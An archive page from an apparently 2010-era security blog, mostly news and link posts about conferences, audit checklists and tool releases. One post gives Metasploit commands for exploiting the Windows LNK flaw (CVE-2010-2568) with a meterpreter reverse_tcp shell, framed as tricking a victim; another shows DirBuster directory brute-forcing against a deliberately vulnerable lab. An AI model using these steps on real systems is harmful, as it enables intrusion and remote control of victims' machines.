Archive for July, 2010

BLACK HAT USA 2010 Archieves

0

Blackhat USA 2010 is over now who ever didnt Arrived at Blackhat here is the Archives of PPT and Videos of all the Presentations.

https://www.blackhat.com/html/bh-us-10/bh-us-10-archives.html

Web Application Security Audit checklists

0

Below are the few Audit checklists which helps in Securing the WebApplication.

http://msdn.microsoft.com/en-us/library/aa302332.aspx
https://blogs.sans.org/it-audit/checklists/web-application-audit-checklist/
http://www.owasp.org/index.php/Category:OWASP_Testing_Project
https://www.watsonhall.com/methodology/checklists.pl
http://www.bestsecuritytips.com/xfsection+article.articleid+169.htm
http://www.certifiedsecure.eu/checklists/cs-basic-web-application-audit.pdf

Microsoft Releases Advisory to fix LNK Vulnerability

1

Microsoft has been released a Complete Advisory to fix the LNK Vulnerability and a  Detailed Guide and Steps have been given to fix it.

so System administrators make sure u follow the below guide and secure from this threat.

http://support.microsoft.com/kb/2286198

Exploiting Windows LNK vulnerability (CVE-2010-2568)

0

Recently there has been detected a new 0 day exploit which takes advantage of Windows incorrectly parses shortcuts so that malicious code can be executed when the icon of a specially crafted shortcut is displayed. this can be exploited locally through a malicious USB drive, or remotely via network shares and WebDAV.Recently metasploit have pushed the exploit to the msf module.still there is no patch relased for this vulnerability.
there are 2 ways to exploit this

1)keep these 2 files LNK file and the DLL in the USb stick and run on the victim machine
2)or trick the victim in accessing the maclicious site.
we will use 2 nd method .
3)svn update (update ur msf)
3)use windows/browser/ms10_xxx_windows_shell_lnk_execute
4)set payload windows/meterpreter/reverse_tcp
5)set LHOST 192.168.0.103 (your ip)
6)set LPORT 1427 (any port)
7)exploit

chk out my video to accomplish the above method Exploiting Windows LNK vulnerability (CVE-2010-2568)

Security Conferences and Events Lists Covering the Information Security Economy

0

A List of Security Conferences and Events Lists Awesome Details Covering the Information Security Economy.

http://infosecevents.net/

 

Bruteforcing directories and files names on Webapplication servers using DirBuster

1

During Web Application Pentest finding the Sensitive directories files and folders is always  a quite tough  work.

what is DirBuster

DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers. Often is the case now of what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within. DirBuster attempts to find these.

http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project

now i will be showing how to use Dirbuster to find sensitive directories and files in a web application , for the demo i will be using Mutillidae: A Deliberately Vulnerable Set Of PHP Scripts That Implement The OWASP Top 10.

  1. cd /pentest/web/dirbuster
  2. root@punter:/pentest/web/dirbuster# java -jar DirBuster-0.12.jar -u http://192.168.0.103/mutillidae/

now browse and select the directory bruteforce lists ex: directory-list-1.0.txt.

now run the start button u will see Dirbuster will start bruteforcing the dir and files.

see the results it has found /mutillidae/passwords/accounts.txt

Nominations for the Pwnie Awards 2010

0

Nominations have been over for the Pwnie Awards 2010 based on the  person who discovered the most technically sophisticated and interesting bug.

http://pwnies.com/nominations/

Ekoparty Security Conference September 16-17

0

The ekoparty held annually in the Autonomous City of Buenos Aires where attendees, guests, and related specialists from around the world have the opportunity to engage with technological innovation, vulnerabilities and tools in a relaxed atmosphere and knowledge sharing.

Presentations on Web Application Threats and Security

0

All the past and updated Presentations from Jeremiah Grossman.

[slideshare id=4768754&doc=web-app-security-2-100715231657-phpapp02]

[slideshare id=4764407&doc=whitehatbhpreso08032006-100715140133-phpapp02]

[slideshare id=4764390&doc=blackhat2002-singapore-100715180937-phpapp02]

[slideshare id=4764365&doc=blackhatneworleans2002-100715180550-phpapp01]

Rest of the Presentations,Documents and Videos can be found here

http://www.slideshare.net/jeremiahgrossman

r

Metasploit Framework 3.4.1 Released

0

The Metasploit Project is proud to announce the release of the Metasploit Framework version 3.4.1. As always, you can get it from our downloads page,

Go to Top